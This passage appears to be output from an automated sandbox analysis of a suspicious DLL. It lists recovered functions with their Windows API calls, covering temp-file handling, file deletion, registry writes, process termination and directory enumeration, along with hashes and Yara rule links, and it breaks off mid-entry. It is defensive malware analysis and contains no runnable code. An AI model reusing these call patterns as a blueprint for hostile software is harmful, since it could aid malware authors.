                Function 046CD85F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 046CD883
                  • Part of subcall function 046DFCD1: lstrlen.KERNEL32(00000000,74E5F730,-00000001,00000000,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE2
                  • Part of subcall function 046DFCD1: lstrlen.KERNEL32(?,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE9
                  • Part of subcall function 046DFCD1: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 046DFCFB
                  • Part of subcall function 046DFCD1: _snprintf.NTDLL ref: 046DFD21
                  • Part of subcall function 046DFCD1: _snprintf.NTDLL ref: 046DFD55
                  • Part of subcall function 046DFCD1: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 046DFD72
                • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 046CD91D
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 046CD93A
                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 046CD942
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 046CD951
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                • String ID: s:
                • API String ID: 2960378068-2363032815
                • Opcode ID: d07c77e0c946533be0c04fef5c3be672d1ddc7a811dd4d90d2e4edecc464b305
                • Instruction ID: a6b5740dc58eec3b7da7e2add734887811935d0272e1aca4d79945b2d031a4ac
                • Opcode Fuzzy Hash: d07c77e0c946533be0c04fef5c3be672d1ddc7a811dd4d90d2e4edecc464b305
                • Instruction Fuzzy Hash: 5A314176900205AFEB10EFEACD84FAE7BFCEB18304F040469E515E7241F774AA048B61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D23E9 Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046D23FF
                • lstrcmpiW.KERNEL32(00000000,?,74E5F710,?,?,?,046C1626), ref: 046D2437
                • lstrcmpiW.KERNEL32(?,?,?,?,?,046C1626), ref: 046D244C
                • lstrlenW.KERNEL32(?,?,?,?,046C1626), ref: 046D2453
                • CloseHandle.KERNEL32(?,?,?,?,046C1626), ref: 046D247B
                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,046C1626), ref: 046D24A7
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046D24C5
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                • String ID:
                • API String ID: 1496873005-0
                • Opcode ID: 6fe52733937032c9e065a54311710db192be25017454df2315768edbd97ac77c
                • Instruction ID: ff8075d437778c40eebc0945cd4be66e840dea882d754375f63ea3726ed00f21
                • Opcode Fuzzy Hash: 6fe52733937032c9e065a54311710db192be25017454df2315768edbd97ac77c
                • Instruction Fuzzy Hash: B3213D71900306AFEB10AFA6DD98EAE77ECEF14644B045469E806E7211F739E9058B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DB655 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(046E42B9,00000000,046EE4A0,046EE4C0,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB665
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 046DB67B
                • lstrlen.KERNEL32(046D26E1,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB683
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 046DB68F
                • lstrcpy.KERNEL32(046EE4A0,046E42B9), ref: 046DB6A5
                • HeapFree.KERNEL32(00000000,00000000,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB6F9
                • HeapFree.KERNEL32(00000000,046EE4A0,?,?,046E42B9,046D26E1,046EE4A0), ref: 046DB708
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$lstrcpy
                • String ID:
                • API String ID: 1531811622-0
                • Opcode ID: 47576a5a67a14160a38a662ac08541ec225857e348208a5c0f75dc7e46d0fb8d
                • Instruction ID: 02308f8f163d5db0477ae7bb1048f67df751e9549747a19f0bdde25dea29ecf0
                • Opcode Fuzzy Hash: 47576a5a67a14160a38a662ac08541ec225857e348208a5c0f75dc7e46d0fb8d
                • Instruction Fuzzy Hash: 67213731A04284AFEB229F26DC44F6A7FAAEB95B00F054068E8449B214E776BC15CB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CB0CD Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046D0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                  • Part of subcall function 046D0D54: GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                  • Part of subcall function 046D0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                  • Part of subcall function 046D0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                  • Part of subcall function 046D0D54: lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,046C87AD,?), ref: 046CB10E
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,00000000,00000000,?,00000000,046C87AD,?,00000000,?,00000000,?,?), ref: 046CB181
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 2078930461-0
                • Opcode ID: 7ac5521e393bb684dbdfa52c3259f02be011052e13c201d30c865f94f7cb5545
                • Instruction ID: 7fbd51eaf5326347335708821d959e3f2cdc56e188a587fa2bce89aeb4ef7b61
                • Opcode Fuzzy Hash: 7ac5521e393bb684dbdfa52c3259f02be011052e13c201d30c865f94f7cb5545
                • Instruction Fuzzy Hash: 8A11EF31240314BBE3326B22EC89F7B3E9CEB45B65F001229F601AB590F6666C54C7B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C64A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C45AA: lstrlen.KERNEL32(00000000,00000000,7691C740,74E481D0,?,?,?,046C64BB,?,00000000,74E481D0,?,?,046D09CA,00000000,04C9C0E0), ref: 046C4611
                  • Part of subcall function 046C45AA: sprintf.NTDLL ref: 046C4632
                • lstrlen.KERNEL32(00000000,7691C740,?,00000000,74E481D0,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64CD
                • lstrlen.KERNEL32(?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64D5
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • strcpy.NTDLL ref: 046C64EC
                • lstrcat.KERNEL32(00000000,?), ref: 046C64F7
                  • Part of subcall function 046D4E2F: lstrlen.KERNEL32(?,?,?,00000000,?,046C6506,00000000,?,?,?,046D09CA,00000000,04C9C0E0), ref: 046D4E40
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C6514
                  • Part of subcall function 046D91FF: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,046C6520,00000000,?,?,046D09CA,00000000,04C9C0E0), ref: 046D9209
                  • Part of subcall function 046D91FF: _snprintf.NTDLL ref: 046D9267
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: b0cde25fad8bd58978e46f4867f09acd4c66c3eb3bbef5b9314f65e5c6b355d3
                • Instruction ID: 884cf471b1e778a144a4f1b62529c4a9bd9717364252fb85caecb1159e0308bc
                • Opcode Fuzzy Hash: b0cde25fad8bd58978e46f4867f09acd4c66c3eb3bbef5b9314f65e5c6b355d3
                • Instruction Fuzzy Hash: A311A333901625BB97127BA59C88CBF369DDE99658315001DF901AB204FEB8FE0157F8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C6584 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                Download Yara Rule
                APIs
                • SwitchToThread.KERNEL32(?,?,046CE039), ref: 046C65AF
                • CloseHandle.KERNEL32(?,?,046CE039), ref: 046C65BB
                • CloseHandle.KERNEL32(00000000,74E5F720,?,046C6113,00000000,?,?,?,046CE039), ref: 046C65CD
                • memset.NTDLL ref: 046C65E4
                • memset.NTDLL ref: 046C65FB
                • memset.NTDLL ref: 046C6612
                • memset.NTDLL ref: 046C6629
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset$CloseHandle$SwitchThread
                • String ID:
                • API String ID: 3699883640-0
                • Opcode ID: 9f57a5ecd01cdf3d150bd9cc1017ab318472a018ab975c2788e44bfd90f14359
                • Instruction ID: 102b9d13cc2baef66f2c7fb48bc06962f2516bbf33d557aa164126fc8db81e05
                • Opcode Fuzzy Hash: 9f57a5ecd01cdf3d150bd9cc1017ab318472a018ab975c2788e44bfd90f14359
                • Instruction Fuzzy Hash: D51182319426207BE6217B27DC08D6B7AECEFA6714B44103DF104AB545FA6ABD0486ED
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D4FBE Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D4FEF
                • wcstombs.NTDLL ref: 046D5000
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(046EE21C,0000002E,00000000,00000000,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFF9D
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(00000004,00000020,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFFAC
                • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 046D5021
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 046D5030
                • CloseHandle.KERNEL32(00000000), ref: 046D5037
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 046D5046
                • WaitForSingleObject.KERNEL32(00000000), ref: 046D5056
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                • String ID:
                • API String ID: 417118235-0
                • Opcode ID: f6f44b79bf67a8e42368e1f8141dd6c09edc9142bdf5bc16c091bb29ce054b30
                • Instruction ID: a304c9f0c365cfa5af86160086cc9d3e3ea221053dd25214c5dd40b2c47413f7
                • Opcode Fuzzy Hash: f6f44b79bf67a8e42368e1f8141dd6c09edc9142bdf5bc16c091bb29ce054b30
                • Instruction Fuzzy Hash: 7B11BF31500615BBE720AF56DC48FAA7BA8FB14751F141010FA05AB680F7BAAD94CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D277C Relevance: 10.6, APIs: 7, Instructions: 57memoryregistrystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(046D26E1,00000000,00000000,046EE4C0,?,?,046E42C8,046D26E1,00000000,046D26E1,046EE4A0), ref: 046D278F
                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 046D279D
                • wsprintfA.USER32 ref: 046D27B9
                • RegCreateKeyA.ADVAPI32(80000001,046EE4A0,00000000), ref: 046D27D1
                • lstrlen.KERNEL32(?), ref: 046D27E0
                • RegCloseKey.ADVAPI32(?), ref: 046D27F9
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D2808
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
                • String ID:
                • API String ID: 3908752696-0
                • Opcode ID: 9a53bfa3b6123bd2854ca54025b5f7a2f48e15935798d8b8abbec4961479d95f
                • Instruction ID: 364bb4e643c21ed4dd31d452387a473a5dfd38ec0493cea952fbdb401bdbca2b
                • Opcode Fuzzy Hash: 9a53bfa3b6123bd2854ca54025b5f7a2f48e15935798d8b8abbec4961479d95f
                • Instruction Fuzzy Hash: 92116D72600209FFEB115F96EC88EAA3BBDEB44714F101021FA049A150FB769D549B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CAEC5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(?,?,?,?,?,046C1DC6,00000000), ref: 046CAEE6
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CAEFF
                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF1C
                • IsWow64Process.KERNEL32(?,?,?,?,?,?,046C1DC6,00000000), ref: 046CAF2D
                • CloseHandle.KERNEL32(?,?,?,?,046C1DC6,00000000), ref: 046CAF40
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleProcess$AddressCloseModuleOpenProcWow64
                • String ID: PWt
                • API String ID: 4157061983-1902262044
                • Opcode ID: c7bc4a396301c4781561c162a2e6d70701fbd77e9b5f67d324d2bc2b36eec4b0
                • Instruction ID: 2a88662fae58f15298a8f98251700fcf94d93fa72b0d21712d2d5da16b83ae93
                • Opcode Fuzzy Hash: c7bc4a396301c4781561c162a2e6d70701fbd77e9b5f67d324d2bc2b36eec4b0
                • Instruction Fuzzy Hash: 1F0192B190020AEFCB21DFA6D948DAE7BF8FB94341710865AF405DB201F736AE01CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DD327 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                Download Yara Rule
                APIs
                • wsprintfA.USER32 ref: 046DD33A
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 046DD34C
                • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 046DD376
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 046DD389
                • CloseHandle.KERNEL32(?), ref: 046DD392
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                • String ID: 0x%08X
                • API String ID: 603522830-3182613153
                • Opcode ID: 7f12f85373bc361879db6a2293658b2043499ecc561802522798cad709954d41
                • Instruction ID: f67c8ba4cfcc3ce97419f245f703a2731b3c4b6f354fe26bf90d9004244849c9
                • Opcode Fuzzy Hash: 7f12f85373bc361879db6a2293658b2043499ecc561802522798cad709954d41
                • Instruction Fuzzy Hash: 74011E71901219BBDB10AB95DC0DDEFBFBCEF45350B004219E515E7185E778AA01CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C42A8 Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetLastError.KERNEL32(?,?,?,00001000), ref: 046C4329
                • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 046C43AE
                • CloseHandle.KERNEL32(00000000), ref: 046C43C8
                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 046C43FD
                  • Part of subcall function 046C5788: RtlReAllocateHeap.NTDLL(00000000,?,?,046C7DB7), ref: 046C5798
                • WaitForSingleObject.KERNEL32(?,00000064), ref: 046C447F
                • CloseHandle.KERNEL32(?), ref: 046C44A6
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                • String ID:
                • API String ID: 3115907006-0
                • Opcode ID: 7771812fbf212e78344b50d5ce11f6b9cc27b27c7e28bca2b3feb80421beb88f
                • Instruction ID: ae0aedd2c9609818e9193e858862545abc64dab0539abd9fa4c8989e30336cd2
                • Opcode Fuzzy Hash: 7771812fbf212e78344b50d5ce11f6b9cc27b27c7e28bca2b3feb80421beb88f
                • Instruction Fuzzy Hash: 7D814771E00219EFDB10DF95C894AADBBB5FF48344F248459E909AB250EB34BE41CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C58E1 Relevance: 9.2, APIs: 6, Instructions: 198timestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • FileTimeToLocalFileTime.KERNEL32(00000000,046C8A58), ref: 046C5940
                • FileTimeToSystemTime.KERNEL32(046C8A58,?), ref: 046C594E
                • lstrlenW.KERNEL32(00000010), ref: 046C595E
                • lstrlenW.KERNEL32(00000218), ref: 046C596A
                • FileTimeToLocalFileTime.KERNEL32(00000008,046C8A58), ref: 046C5A57
                • FileTimeToSystemTime.KERNEL32(046C8A58,?), ref: 046C5A65
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                • String ID:
                • API String ID: 1122361434-0
                • Opcode ID: ffd2dd03fac9b8df5a268ff695b428951545e5b1153a50fbe8ef9b33ee23b209
                • Instruction ID: 1faf8168b450beb0b870e87eb1cdb03860d5c6d8aab6d7de419d27a46a7f1791
                • Opcode Fuzzy Hash: ffd2dd03fac9b8df5a268ff695b428951545e5b1153a50fbe8ef9b33ee23b209
                • Instruction Fuzzy Hash: 4C71FC71A0021AAFCB50DFA9C884AFEB7F8FB48304F14455AE546E7241F738EA45DB64
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CCC2E Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32(00000000,?), ref: 046CCC89
                • GetLastError.KERNEL32 ref: 046CCCAF
                • SetEvent.KERNEL32(00000000), ref: 046CCCC2
                • GetModuleHandleA.KERNEL32(00000000), ref: 046CCD0B
                • memset.NTDLL ref: 046CCD20
                • RtlExitUserThread.NTDLL(?), ref: 046CCD55
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                • String ID:
                • API String ID: 3978817377-0
                • Opcode ID: eff2b3d37333bf6fd6cafd0948857d888dd1e372c1310e66e7f94dda3adee9ca
                • Instruction ID: 8cd8c72134233786d6e01d5305d58d5dff6a1f99eab095094747f688f674f551
                • Opcode Fuzzy Hash: eff2b3d37333bf6fd6cafd0948857d888dd1e372c1310e66e7f94dda3adee9ca
                • Instruction Fuzzy Hash: D4415BB1900604AFDB209FA9CD8887ABBFDEF95711724455EE90AE7240F735BD41DB20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D70ED Relevance: 9.1, APIs: 6, Instructions: 121memoryCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL(?), ref: 046D7106
                  • Part of subcall function 046E2E6E: lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,046D7126,?), ref: 046E2E9A
                  • Part of subcall function 046E2E6E: RtlAllocateHeap.NTDLL(00000000,?), ref: 046E2EAC
                  • Part of subcall function 046E2E6E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EC9
                  • Part of subcall function 046E2E6E: lstrlenW.KERNEL32(00000000,?,?,046D7126,?), ref: 046E2ED5
                  • Part of subcall function 046E2E6E: HeapFree.KERNEL32(00000000,00000000,?,?,046D7126,?), ref: 046E2EE9
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046D713E
                • CloseHandle.KERNEL32(?), ref: 046D714C
                • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 046D721E
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046D722D
                • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 046D7240
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                • String ID:
                • API String ID: 1719504581-0
                • Opcode ID: f32a107b92dfa926ef016a75a2c99e9fa7e9bedbc19999e30c582bfed28f77ab
                • Instruction ID: c8194655566d55aa8c192d19cd437ad53a00128583d638547309755fdd66c07c
                • Opcode Fuzzy Hash: f32a107b92dfa926ef016a75a2c99e9fa7e9bedbc19999e30c582bfed28f77ab
                • Instruction Fuzzy Hash: 8041C131A00609EBDB219F95DC84BAA7BF9FB58705F040129F504AB210FB75FE45DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CCD5C Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4a411b4fcd58a480b6389b15f45659f52fa9de9a567f759fc46935c0729cee8
                • Instruction ID: cfc85f6d88bef5ed690c599e5f0fdc4546cee98e9554c794da78f930235b1142
                • Opcode Fuzzy Hash: e4a411b4fcd58a480b6389b15f45659f52fa9de9a567f759fc46935c0729cee8
                • Instruction Fuzzy Hash: 2841D471500705DFD730AF69888496BB7E9FB89364B004A2EF1AAC76C0F770E8018B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D5A54 Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046D5AA7
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 046D5AC8
                • lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046D5AF2
                  • Part of subcall function 046DD39D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 046DD4F3
                  • Part of subcall function 046DD39D: RtlEnterCriticalSection.NTDLL(?), ref: 046DD528
                  • Part of subcall function 046DD39D: RtlLeaveCriticalSection.NTDLL(?), ref: 046DD544
                  • Part of subcall function 046DD39D: FindNextFileW.KERNEL32(?,00000000), ref: 046DD55D
                  • Part of subcall function 046DD39D: WaitForSingleObject.KERNEL32(00000000), ref: 046DD56F
                  • Part of subcall function 046DD39D: FindClose.KERNEL32(?), ref: 046DD584
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD598
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD5BA
                • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 046D5B0F
                • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 046D5B26
                • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046D5B3B
                  • Part of subcall function 046D42D2: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,046D5B52,?,0000001E,?), ref: 046D42E7
                  • Part of subcall function 046D42D2: lstrlenW.KERNEL32(00000000,?,?,?,046D5B52,?,0000001E,?), ref: 046D42EF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                • String ID:
                • API String ID: 2670873185-0
                • Opcode ID: 44cacba63d725a3010eb0ba44e1d783d9372a5bf7655e174d82e4a50ef124a27
                • Instruction ID: 294ba84cb72a45d3f4dacf9d666bbd2bdd9bc05f93d1358ef32c48015c9ef10a
